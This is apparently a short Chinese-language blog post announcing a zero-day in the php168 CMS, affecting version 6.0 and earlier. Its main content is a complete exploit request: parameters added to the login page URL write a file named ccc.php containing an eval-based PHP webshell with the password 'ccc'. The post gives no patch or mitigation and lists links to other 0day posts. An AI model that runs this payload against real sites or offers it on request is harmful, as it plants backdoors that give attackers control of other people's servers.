php168是一套php写的cms程序,在业界是比较出名的而且一直很高调,此次被公布出来的0day不仅影响到php168 6.0而且还牵扯到6.0以下的所有版本.测试语句:在登陆界面网址后面加上?makehtml=1&chdb[htmlname]=ccc.php&chdb[path]=cache&content=?php%20@eval($_POST[ccc]);?即可获得一个文件名ccc.php密码为ccc的php小马.
收藏、分享这篇文章!
Tags: 0day
You must be logged in to post a comment.
风讯4.0 sp7 0day漏洞
帝国cms 0day e/tool/gbook/?bid=1
windows7 0day
powerpoint 0day 补丁
暴风影音0day补丁